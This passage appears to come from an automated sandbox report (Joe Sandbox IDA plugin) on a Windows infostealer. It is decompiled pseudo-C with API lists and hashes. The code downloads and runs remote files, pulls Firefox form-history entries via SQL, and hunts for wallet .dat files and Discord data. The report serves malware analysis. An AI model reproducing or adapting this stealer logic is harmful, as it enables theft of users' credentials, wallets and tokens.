                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				void* _t74;
                                                                                				signed int _t75;
                                                                                				void* _t77;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t75 = _t77 - 0x4a4;
                                                                                				_t35 =  *0x447674; // 0x4124c941
                                                                                				 *(_t75 + 0x4a0) = _t35 ^ _t75;
                                                                                				_t61 = __ecx;
                                                                                				 *(_t75 - 0x80) =  *(_t75 + 0x4ac);
                                                                                				 *(_t75 - 0x74) = 0;
                                                                                				 *(_t75 - 0x78) = 0x100;
                                                                                				_t38 = InternetOpenA(0x43e028, 1, 0, 0, 0);
                                                                                				 *(_t75 - 0x70) = _t38;
                                                                                				if(_t38 != 0) {
                                                                                					_push("https");
                                                                                					_push(E0040E608(__ecx, 0x100, 0));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						 *(_t75 - 0x74) = 1;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t75 - 0x6c)) = 0;
                                                                                					do {
                                                                                						_push(0);
                                                                                						if( *(_t75 - 0x74) == 0) {
                                                                                							_push(0x100);
                                                                                						} else {
                                                                                							_push(0x800100);
                                                                                						}
                                                                                						 *(_t75 - 0x64) = InternetOpenUrlA( *(_t75 - 0x70), _t61, 0, 0, ??, ??);
                                                                                						if(HttpQueryInfoA( *(_t75 - 0x64), 0x13, _t75 + 0x3a0, _t75 - 0x78, 0) == 0) {
                                                                                							goto L10;
                                                                                						} else {
                                                                                							_push("200");
                                                                                							_push(_t75 + 0x3a0);
                                                                                							if( *0x44a1d8() != 0) {
                                                                                								Sleep(0x3e8);
                                                                                								goto L10;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                						L10:
                                                                                						 *((intOrPtr*)(_t75 - 0x6c)) =  *((intOrPtr*)(_t75 - 0x6c)) + 1;
                                                                                					} while ( *((intOrPtr*)(_t75 - 0x6c)) < 3);
                                                                                					_t71 = CreateFileA( *(_t75 - 0x80), 0x40000000, 3, 0, 2, 0x80, 0);
                                                                                					while(InternetReadFile( *(_t75 - 0x64), _t75 - 0x60, 0x400, _t75 - 0x68) != 0) {
                                                                                						if( *(_t75 - 0x68) <= 0 || WriteFile(_t71, _t75 - 0x60,  *(_t75 - 0x68), _t75 - 0x7c, 0) != 0 &&  *(_t75 - 0x68) ==  *(_t75 - 0x7c)) {
                                                                                							if( *(_t75 - 0x68) >= 0x400) {
                                                                                								continue;
                                                                                							}
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					E00427E30(_t75 - 0x60, 0, 0x400);
                                                                                					CloseHandle(_t71);
                                                                                					InternetCloseHandle( *(_t75 - 0x64));
                                                                                					_t38 = InternetCloseHandle( *(_t75 - 0x70));
                                                                                				}
                                                                                				_pop(_t70);
                                                                                				_pop(_t74);
                                                                                				_pop(_t62);
                                                                                				return E0041DEB4(_t38, _t62,  *(_t75 + 0x4a0) ^ _t75, _t67, _t70, _t74);
                                                                                			}
















                                                                                0x0040e67c
                                                                                0x0040e67d
                                                                                0x0040e68a
                                                                                0x0040e691
                                                                                0x0040e6b1
                                                                                0x0040e6b3
                                                                                0x0040e6b6
                                                                                0x0040e6b9
                                                                                0x0040e6bc
                                                                                0x0040e6c2
                                                                                0x0040e6c7
                                                                                0x0040e6cd
                                                                                0x0040e6d7
                                                                                0x0040e6e0
                                                                                0x0040e6e2
                                                                                0x0040e6e2
                                                                                0x0040e6e9
                                                                                0x0040e6ec
                                                                                0x0040e6ec
                                                                                0x0040e6f0
                                                                                0x0040e6f9
                                                                                0x0040e6f2
                                                                                0x0040e6f2
                                                                                0x0040e6f2
                                                                                0x0040e706
                                                                                0x0040e722
                                                                                0x00000000
                                                                                0x0040e724
                                                                                0x0040e724
                                                                                0x0040e72f
                                                                                0x0040e738
                                                                                0x0040e73f
                                                                                0x00000000
                                                                                0x0040e73f
                                                                                0x0040e738
                                                                                0x00000000
                                                                                0x0040e745
                                                                                0x0040e745
                                                                                0x0040e748
                                                                                0x0040e767
                                                                                0x0040e799
                                                                                0x0040e773
                                                                                0x0040e797
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e797
                                                                                0x00000000
                                                                                0x0040e773
                                                                                0x0040e7b5
                                                                                0x0040e7be
                                                                                0x0040e7c7
                                                                                0x0040e7d0
                                                                                0x0040e7d0
                                                                                0x0040e7dc
                                                                                0x0040e7dd
                                                                                0x0040e7e0
                                                                                0x0040e7ed

                                                                                APIs
                                                                                • InternetOpenA.WININET(0043E028,00000001,00000000,00000000,00000000), ref: 0040E6BC
                                                                                  • Part of subcall function 0040E608: _memset.LIBCMT ref: 0040E623
                                                                                  • Part of subcall function 0040E608: _memset.LIBCMT ref: 0040E630
                                                                                  • Part of subcall function 0040E608: lstrlenA.KERNEL32(?,10000000,?), ref: 0040E656
                                                                                  • Part of subcall function 0040E608: InternetCrackUrlA.WININET(?,00000000,?,10000000), ref: 0040E65E
                                                                                • StrCmpCA.SHLWAPI(00000000,https,?,00000000), ref: 0040E6D8
                                                                                • InternetOpenUrlA.WININET(?,?,00000000,00000000,00000100,00000000), ref: 0040E700
                                                                                • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040E71A
                                                                                • StrCmpCA.SHLWAPI(?,200,?,00000000), ref: 0040E730
                                                                                • Sleep.KERNEL32(000003E8,?,00000000), ref: 0040E73F
                                                                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000,?,00000000), ref: 0040E761
                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 0040E782
                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0040E7A5
                                                                                • _memset.LIBCMT ref: 0040E7B5
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040E7BE
                                                                                • InternetCloseHandle.WININET(?), ref: 0040E7C7
                                                                                • InternetCloseHandle.WININET(?), ref: 0040E7D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseFileHandle_memset$Open$CrackCreateHttpInfoQueryReadSleepWritelstrlen
                                                                                • String ID: 200$https
                                                                                • API String ID: 1246493084-2945048398
                                                                                • Opcode ID: 2166902c2538bca1afb59c9871c25a592ac0c21d90d17c72aab791548218289a
                                                                                • Instruction ID: cd48dd3fe015acc541eedf6a26b47031311dbc4bd5b6e07b5c36a9c67a77faee
                                                                                • Opcode Fuzzy Hash: 2166902c2538bca1afb59c9871c25a592ac0c21d90d17c72aab791548218289a
                                                                                • Instruction Fuzzy Hash: B5415971A40218AFDB209FA2DC88EEEBBBCFF46714F10042AF509E7191D6785914DB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00407E57(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t42;
                                                                                				short _t48;
                                                                                				intOrPtr _t49;
                                                                                				CHAR* _t50;
                                                                                				void* _t53;
                                                                                				int _t55;
                                                                                				intOrPtr* _t58;
                                                                                				CHAR* _t77;
                                                                                				void* _t80;
                                                                                				void* _t91;
                                                                                				void* _t94;
                                                                                				void* _t96;
                                                                                				signed int _t97;
                                                                                				void* _t99;
                                                                                				void* _t100;
                                                                                				void* _t101;
                                                                                				void* _t102;
                                                                                
                                                                                				_t95 = __esi;
                                                                                				_t91 = __edx;
                                                                                				_t100 = _t99 - 0x120;
                                                                                				_t97 = _t100 - 4;
                                                                                				_t42 =  *0x447674; // 0x4124c941
                                                                                				 *(_t97 + 0x120) = _t42 ^ _t97;
                                                                                				_push(0x48);
                                                                                				E00421975(E004363D7, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t97 - 4)) = 0;
                                                                                				E00427E30(_t97 + 0x1c, 0, 0x104);
                                                                                				_t101 = _t100 + 0xc;
                                                                                				_t48 = 0x3b;
                                                                                				 *((short*)(_t97 - 0x10)) = _t48;
                                                                                				_t49 =  *((intOrPtr*)(_t97 + 0x12c));
                                                                                				if( *((intOrPtr*)(_t97 + 0x140)) < 0x10) {
                                                                                					_t49 = _t97 + 0x12c;
                                                                                				}
                                                                                				_t50 = E0041F145(0, _t91, 0x104, _t49, _t97 - 0x10, _t97 - 0x18);
                                                                                				_t102 = _t101 + 0xc;
                                                                                				 *(_t97 - 0x14) = _t50;
                                                                                				if(_t50 != 0) {
                                                                                					do {
                                                                                						_t55 = lstrlenA( *(_t97 - 0x14));
                                                                                						_t108 = _t55 - 5;
                                                                                						if(_t55 > 5) {
                                                                                							 *0x44a1b8(_t97 + 0x1c,  *0x449ee0);
                                                                                							_push(0x14);
                                                                                							_t58 = E00417368(0, _t97, _t91, 0x104, _t95, _t108);
                                                                                							 *((char*)(_t97 - 4)) = 1;
                                                                                							if( *((intOrPtr*)(_t58 + 0x14)) >= 0x10) {
                                                                                								_t58 =  *_t58;
                                                                                							}
                                                                                							 *0x44a1b8(_t97 + 0x1c, _t58);
                                                                                							 *((char*)(_t97 - 4)) = 0;
                                                                                							E00402C34(_t97, 1, 0);
                                                                                							 *0x44a1b8(_t97 + 0x1c,  *0x449dd8);
                                                                                							E0040E67C( *(_t97 - 0x14), _t91);
                                                                                							E00427E30(_t97 - 0x54, 0, 0x3c);
                                                                                							 *((intOrPtr*)(_t97 - 0x44)) = _t97 + 0x1c;
                                                                                							 *((intOrPtr*)(_t97 - 0x54)) = 0x3c;
                                                                                							 *((intOrPtr*)(_t97 - 0x50)) = 0;
                                                                                							 *((intOrPtr*)(_t97 - 0x4c)) = 0;
                                                                                							 *(_t97 - 0x48) = "open";
                                                                                							 *((intOrPtr*)(_t97 - 0x40)) = 0x43e028;
                                                                                							 *((intOrPtr*)(_t97 - 0x3c)) = 0;
                                                                                							 *((intOrPtr*)(_t97 - 0x38)) = 5;
                                                                                							 *((intOrPtr*)(_t97 - 0x34)) = 0;
                                                                                							 *0x44a1f8(_t97 - 0x54, _t97 + 0x1c);
                                                                                							E00427E30(_t97 - 0x54, 0, 0x3c);
                                                                                							E00427E30(_t97 + 0x1c, 0, 0x104);
                                                                                							_t77 = E0041F145(0, _t91, 0x104, 0, _t97 - 0x10, _t97 - 0x18);
                                                                                							_t102 = _t102 + 0x34;
                                                                                							 *(_t97 - 0x14) = _t77;
                                                                                						}
                                                                                					} while ( *(_t97 - 0x14) != 0);
                                                                                				}
                                                                                				 *0x44a340 = 1;
                                                                                				_t53 = E00402C34(_t97 + 0x12c, 1, 0);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
                                                                                				_pop(_t94);
                                                                                				_pop(_t96);
                                                                                				_pop(_t80);
                                                                                				return E0041DEB4(_t53, _t80,  *(_t97 + 0x120) ^ _t97, _t91, _t94, _t96);
                                                                                			}





















                                                                                0x00407e57
                                                                                0x00407e57
                                                                                0x00407e58
                                                                                0x00407e5e
                                                                                0x00407e62
                                                                                0x00407e69
                                                                                0x00407e6f
                                                                                0x00407e76
                                                                                0x00407e88
                                                                                0x00407e8b
                                                                                0x00407e90
                                                                                0x00407e9c
                                                                                0x00407e9d
                                                                                0x00407ea1
                                                                                0x00407ea7
                                                                                0x00407ea9
                                                                                0x00407ea9
                                                                                0x00407eb8
                                                                                0x00407ebd
                                                                                0x00407ec0
                                                                                0x00407ec5
                                                                                0x00407ecb
                                                                                0x00407ece
                                                                                0x00407ed4
                                                                                0x00407ed7
                                                                                0x00407ee7
                                                                                0x00407eed
                                                                                0x00407ef2
                                                                                0x00407ef7
                                                                                0x00407eff
                                                                                0x00407f01
                                                                                0x00407f01
                                                                                0x00407f08
                                                                                0x00407f14
                                                                                0x00407f17
                                                                                0x00407f26
                                                                                0x00407f33
                                                                                0x00407f3f
                                                                                0x00407f47
                                                                                0x00407f51
                                                                                0x00407f58
                                                                                0x00407f5b
                                                                                0x00407f5e
                                                                                0x00407f65
                                                                                0x00407f6c
                                                                                0x00407f6f
                                                                                0x00407f76
                                                                                0x00407f79
                                                                                0x00407f86
                                                                                0x00407f91
                                                                                0x00407f9f
                                                                                0x00407fa4
                                                                                0x00407fa7
                                                                                0x00407fa7
                                                                                0x00407faa
                                                                                0x00407ecb
                                                                                0x00407fbe
                                                                                0x00407fc3
                                                                                0x00407fcb
                                                                                0x00407fd3
                                                                                0x00407fd4
                                                                                0x00407fd5
                                                                                0x00407fea

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memset$lstrcat$_strtok_s$ExecuteH_prolog3Shelllstrlen
                                                                                • String ID: (C
                                                                                • API String ID: 403364113-3375610692
                                                                                • Opcode ID: 7f17d65ac0e168acf629745cbc711c2fc097131cc66965550252424a90f2d50b
                                                                                • Instruction ID: 7b9a904dc1d93ea48c18e3dad43512a8569cd8173603b5d985684eb9963d7091
                                                                                • Opcode Fuzzy Hash: 7f17d65ac0e168acf629745cbc711c2fc097131cc66965550252424a90f2d50b
                                                                                • Instruction Fuzzy Hash: 31412BB1D0424DAFDB14DFE0DC85AEEB7B8FB09304F40442AE505A7281E7789A59CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00410D54(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				void* _t50;
                                                                                				void* _t55;
                                                                                				void* _t57;
                                                                                				void* _t68;
                                                                                				CHAR* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				signed int _t76;
                                                                                				void* _t78;
                                                                                				void* _t80;
                                                                                				void* _t82;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t76 = _t78 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t76 + 0x194) = _t24 ^ _t76;
                                                                                				 *((intOrPtr*)(_t76 - 0x80)) =  *((intOrPtr*)(_t76 + 0x1a0));
                                                                                				_t69 = __ecx;
                                                                                				_t56 = __edx;
                                                                                				GetCurrentDirectoryA(0x104, _t76 + 0x90);
                                                                                				 *0x44a1b8(_t76 + 0x90, "\\temp", _t68, _t72, _t55);
                                                                                				CopyFileA(_t69, _t76 + 0x90, 1);
                                                                                				E00427E30(_t76 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t76 - 0x74, "Autofill\\%s_%s.txt",  *((intOrPtr*)(_t76 - 0x80)), _t56);
                                                                                				_t39 =  *0x44a0a4(_t76 + 0x90, _t76 - 0x7c);
                                                                                				_t80 = _t78 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t76 - 0x7c)), "SELECT fieldname, value FROM moz_formhistory", 0xffffffff, _t76 - 0x78, 0);
                                                                                					_t82 = _t80 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t75 = E00420300(_t76 - 0x74, "w");
                                                                                						if(_t75 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)));
                                                                                							while(1) {
                                                                                								_t86 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t50 =  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 0);
                                                                                								_t56 = _t50;
                                                                                								E0041E879(_t50, 0, _t75, __eflags);
                                                                                								E0041E879(_t50, 0, _t75, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t76 - 0x78)), _t75, "\n", _t75, "%s\t%s", _t50,  *0x44a094( *((intOrPtr*)(_t76 - 0x78)), 1));
                                                                                								_t82 = _t82 + 0x2c;
                                                                                							}
                                                                                							_push(_t75);
                                                                                							E0041EAA2(_t56, 0, _t75, _t86);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t76 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t76 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t76 + 0x90);
                                                                                				_pop(_t71);
                                                                                				_pop(_t74);
                                                                                				_pop(_t57);
                                                                                				return E0041DEB4(_t41, _t57,  *(_t76 + 0x194) ^ _t76, _t67, _t71, _t74);
                                                                                			}

























                                                                                0x00410d54
                                                                                0x00410d55
                                                                                0x00410d62
                                                                                0x00410d69
                                                                                0x00410d78
                                                                                0x00410d88
                                                                                0x00410d8a
                                                                                0x00410d8c
                                                                                0x00410d9e
                                                                                0x00410dae
                                                                                0x00410dbc
                                                                                0x00410dce
                                                                                0x00410ddf
                                                                                0x00410de5
                                                                                0x00410dea
                                                                                0x00410dff
                                                                                0x00410e05
                                                                                0x00410e0a
                                                                                0x00410e1a
                                                                                0x00410e20
                                                                                0x00410e25
                                                                                0x00410e69
                                                                                0x00410e69
                                                                                0x00410e6c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00410e32
                                                                                0x00410e3d
                                                                                0x00410e4d
                                                                                0x00410e58
                                                                                0x00410e60
                                                                                0x00410e66
                                                                                0x00410e66
                                                                                0x00410e6e
                                                                                0x00410e6f
                                                                                0x00410e74
                                                                                0x00410e20
                                                                                0x00410e78
                                                                                0x00410e81
                                                                                0x00410e88
                                                                                0x00410e90
                                                                                0x00410e9c
                                                                                0x00410e9d
                                                                                0x00410ea0
                                                                                0x00410ead

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetlstrcatwsprintf
                                                                                • String ID: %s%s$(>A(C$Autofill\%s_%s.txt$SELECT fieldname, value FROM moz_formhistory$\temp
                                                                                • API String ID: 3845412190-3770164209
                                                                                • Opcode ID: e44210951bee8055899ec79d70d4a1b528f5e3fbaf2fb05f7806a62cf646611b
                                                                                • Instruction ID: 032f60a57976095649d428e1fe611b592d31abf26e0f6a1b5b49816b837eed00
                                                                                • Opcode Fuzzy Hash: e44210951bee8055899ec79d70d4a1b528f5e3fbaf2fb05f7806a62cf646611b
                                                                                • Instruction Fuzzy Hash: 2C317376940208AFEB209FB5EC49EDE7BBCEF09304F10013BF609E3151DA7999948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
                                                                                			E00408FB7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr* _t51;
                                                                                				intOrPtr* _t73;
                                                                                				void* _t77;
                                                                                				void* _t78;
                                                                                				intOrPtr _t80;
                                                                                				void* _t83;
                                                                                				void* _t86;
                                                                                
                                                                                				_t86 = __eflags;
                                                                                				E004219DE(E00436B5B, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t77 - 4)) = 0;
                                                                                				E00427E30(_t77 - 0x118, 0, 0x104);
                                                                                				 *0x44a1b8(_t77 - 0x118, E0041F644(0, __edi, 0x104, _t86), "APPDATA", 0x358);
                                                                                				_t80 = _t78 + 0xc - 0x1c;
                                                                                				 *((intOrPtr*)(_t77 - 0x364)) = _t80;
                                                                                				E0040D337(0, _t77 + 8, 0x104, _t86);
                                                                                				E0040895E(0, _t77 + 8, 0x104, _t86);
                                                                                				E00427E30(_t77 - 0x328, 0, 0x104);
                                                                                				 *0x44a1b8(_t77 - 0x328, E0041F644(0, _t77 + 8, 0x104, _t86),  *0x449e58, _t80,  *0x449b84, 0x43e028, _t77 - 0x118, "*allet*.dat");
                                                                                				E00427E30(_t77 - 0x220, 0, 0x104);
                                                                                				 *0x44a1b8(_t77 - 0x220, E0041F644(0, _t77 + 8, 0x104, _t86),  *0x449ea8);
                                                                                				 *((intOrPtr*)(_t77 - 0x330)) = 0xf;
                                                                                				 *((intOrPtr*)(_t77 - 0x334)) = 0;
                                                                                				 *((char*)(_t77 - 0x344)) = 0;
                                                                                				E00403A16(_t77 - 0x344, _t86, "\\discord\\", 9);
                                                                                				 *((char*)(_t77 - 4)) = 1;
                                                                                				_t51 = E0040D3FA(_t77 - 0x344, _t77 - 0x360, _t77 - 0x220, _t77 - 0x344);
                                                                                				_t83 = _t80 + 0x4c;
                                                                                				 *((char*)(_t77 - 4)) = 2;
                                                                                				_t87 =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
                                                                                				if( *((intOrPtr*)(_t51 + 0x14)) < 0x10) {
                                                                                					_t73 = _t51;
                                                                                				} else {
                                                                                					_t73 =  *_t51;
                                                                                				}
                                                                                				_t84 = _t83 - 0x1c;
                                                                                				 *((intOrPtr*)(_t77 - 0x364)) = _t83 - 0x1c;
                                                                                				E0040410F(_t83 - 0x1c, _t77 + 8);
                                                                                				E00408D8A(0, _t73, _t73, _t84, _t87);
                                                                                				E00402C34(_t77 - 0x360, 1, 0);
                                                                                				E00402C34(_t77 - 0x344, 1, 0);
                                                                                				E00402C34(_t77 + 8, 1, 0);
                                                                                				return E00421A61(0, _t73, _t84);
                                                                                			}










                                                                                0x00408fb7
                                                                                0x00408fc1
                                                                                0x00408fd6
                                                                                0x00408fd9
                                                                                0x00408ff4
                                                                                0x0040900b
                                                                                0x00409010
                                                                                0x00409020
                                                                                0x00409027
                                                                                0x00409035
                                                                                0x00409051
                                                                                0x00409060
                                                                                0x0040907c
                                                                                0x0040908f
                                                                                0x00409099
                                                                                0x0040909f
                                                                                0x004090a5
                                                                                0x004090bf
                                                                                0x004090c3
                                                                                0x004090c8
                                                                                0x004090cb
                                                                                0x004090cf
                                                                                0x004090d3
                                                                                0x004090d9
                                                                                0x004090d5
                                                                                0x004090d5
                                                                                0x004090d5
                                                                                0x004090db
                                                                                0x004090e3
                                                                                0x004090ea
                                                                                0x004090f1
                                                                                0x00409102
                                                                                0x00409110
                                                                                0x0040911b
                                                                                0x00409125

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 00408FC1
                                                                                • _memset.LIBCMT ref: 00408FD9
                                                                                • __wgetenv.LIBCMT ref: 00408FE6
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00408FF4
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 0040895E: __EH_prolog3_GS.LIBCMT ref: 00408968
                                                                                  • Part of subcall function 0040895E: wsprintfA.USER32 ref: 00408994
                                                                                  • Part of subcall function 0040895E: FindFirstFileA.KERNEL32(?,?), ref: 004089AB
                                                                                  • Part of subcall function 0040895E: StrCmpCA.SHLWAPI(?,00440CA4), ref: 004089CC
                                                                                  • Part of subcall function 0040895E: StrCmpCA.SHLWAPI(?,00440CA8), ref: 004089E6
                                                                                  • Part of subcall function 0040895E: wsprintfA.USER32 ref: 00408A0E
                                                                                  • Part of subcall function 0040895E: StrCmpCA.SHLWAPI(?,0043E028), ref: 00408A1D
                                                                                  • Part of subcall function 0040895E: wsprintfA.USER32 ref: 00408A3A
                                                                                  • Part of subcall function 0040895E: PathMatchSpecA.SHLWAPI(?,?), ref: 00408A5E
                                                                                  • Part of subcall function 0040895E: CopyFileA.KERNEL32 ref: 00408AD5
                                                                                • _memset.LIBCMT ref: 00409035
                                                                                • __wgetenv.LIBCMT ref: 00409043
                                                                                  • Part of subcall function 0041F644: _strnlen.LIBCMT ref: 0041F679
                                                                                  • Part of subcall function 0041F644: __lock.LIBCMT ref: 0041F68A
                                                                                  • Part of subcall function 0041F644: __getenv_helper_nolock.LIBCMT ref: 0041F697
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00409051
                                                                                • _memset.LIBCMT ref: 00409060
                                                                                • __wgetenv.LIBCMT ref: 0040906E
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0040907C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __wgetenv_memsetlstrcatwsprintf$FileH_prolog3_$CopyFindFirstH_prolog3MatchPathSpec__getenv_helper_nolock__lock_strnlen
                                                                                • String ID: *allet*.dat$APPDATA$\discord\
                                                                                • API String ID: 3432118877-3186974363
                                                                                • Opcode ID: e4fe5853c59407932ed28206c7e5e32b80d0095f0245b93bb1e551d1452204e1
                                                                                • Instruction ID: fe099da6a48e5303d583074f27277eb26aa91eca6a9e2f70898cdbe9ee9ffaee
                                                                                • Opcode Fuzzy Hash: e4fe5853c59407932ed28206c7e5e32b80d0095f0245b93bb1e551d1452204e1
                                                                                • Instruction Fuzzy Hash: 9E3196B2D0111CBFDB15EBA0DD46ADE777CAB04304F0400FAF509A6092DA799F898B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E004112DA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t167;
                                                                                				void* _t169;
                                                                                				void* _t171;
                                                                                				WCHAR* _t172;
                                                                                				signed char _t173;
                                                                                				void* _t179;
                                                                                				void* _t181;
                                                                                				void* _t183;
                                                                                				intOrPtr _t189;
                                                                                				intOrPtr* _t190;
                                                                                				intOrPtr _t191;
                                                                                				signed int _t205;
                                                                                				intOrPtr _t215;
                                                                                				void* _t226;
                                                                                				intOrPtr* _t227;
                                                                                				void* _t231;
                                                                                				void* _t233;
                                                                                				void* _t248;
                                                                                				char _t285;
                                                                                				void* _t290;
                                                                                				intOrPtr _t311;
                                                                                				intOrPtr _t312;
                                                                                				intOrPtr _t314;
                                                                                				intOrPtr _t315;
                                                                                				intOrPtr _t317;
                                                                                				intOrPtr _t318;
                                                                                				intOrPtr _t320;
                                                                                				intOrPtr _t321;
                                                                                				void* _t331;
                                                                                				void* _t332;
                                                                                				void* _t333;
                                                                                				void* _t334;
                                                                                				void* _t344;
                                                                                				void* _t346;
                                                                                				void* _t348;
                                                                                				void* _t353;
                                                                                				void* _t354;
                                                                                				void* _t356;
                                                                                				intOrPtr _t358;
                                                                                				void* _t359;
                                                                                				void* _t360;
                                                                                				void* _t361;
                                                                                				void* _t362;
                                                                                
                                                                                				_t362 = __eflags;
                                                                                				_t330 = __edx;
                                                                                				_t290 = __ecx;
                                                                                				_push(0x204);
                                                                                				E004219DE(E00436B15, __ebx, __edi, __esi);
                                                                                				_t167 = E00415BB2(__ebx, __edi, _t353 - 0xd4, _t362);
                                                                                				_t285 = 0;
                                                                                				 *(_t353 - 4) = 0;
                                                                                				_t169 = E0040D3FA(_t290, _t353 - 0xb8,  *0x449e74, _t167);
                                                                                				 *(_t353 - 4) = 1;
                                                                                				_t171 = E0040D3C3(_t290, _t353 - 0xf0, _t169,  *0x449c1c);
                                                                                				_t356 = _t354 + 0x18;
                                                                                				 *(_t353 - 4) = 2;
                                                                                				_t172 = E004175C4(_t171, _t353 - 0x10c);
                                                                                				if(_t172[0xa] >= 8) {
                                                                                					_t172 =  *_t172;
                                                                                				}
                                                                                				_t173 = GetFileAttributesW(_t172);
                                                                                				if(_t173 == 0xffffffff) {
                                                                                					L4:
                                                                                					 *((intOrPtr*)(_t353 - 0x148)) = _t285;
                                                                                					L5:
                                                                                					_t340 = _t353 - 0x10c;
                                                                                					E00403960(0, _t353 - 0x10c, 1);
                                                                                					_t337 = 1;
                                                                                					E00402C34(_t353 - 0xf0, 1, _t285);
                                                                                					E00402C34(_t353 - 0xb8, 1, _t285);
                                                                                					 *(_t353 - 4) =  *(_t353 - 4) | 0xffffffff;
